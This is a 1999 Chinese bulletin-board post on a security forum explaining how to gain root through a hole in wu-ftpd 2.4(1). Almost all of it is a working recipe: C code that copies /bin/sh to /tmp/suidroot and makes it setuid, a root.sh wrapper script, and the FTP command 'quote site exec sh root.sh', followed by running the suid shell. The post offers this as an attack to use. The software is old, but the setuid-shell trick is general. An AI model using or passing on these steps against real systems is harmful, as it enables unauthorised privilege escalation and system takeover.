发信人: biff (大可), 信区: Security
标 题: how to gain root access by wu-ftpd hole
发信站: 武汉白云黄鹤站 (Sun Jun 13 15:00:00 1999), 站内信件
This shows you how to use the wuftp2.4(1) hole to gain root.
On the VICTIM system, compile the following C code:
######## CUT HERE #######
system("cp /bin/sh /tmp/suidroot");
system("chmod a+rwxs /tmp/suidroot");
####### CUT HERE #######
Now create a shell script, called root.sh, that contains the following:
####### CUT HERE #######
exec a.out
####### CUT HERE #######
Now, FTP localhost, login as your account on that system and:
ftp> quote site exec sh root.sh
Quit FTP and execute /tmp/suidroot to become root!#@!# Wewp.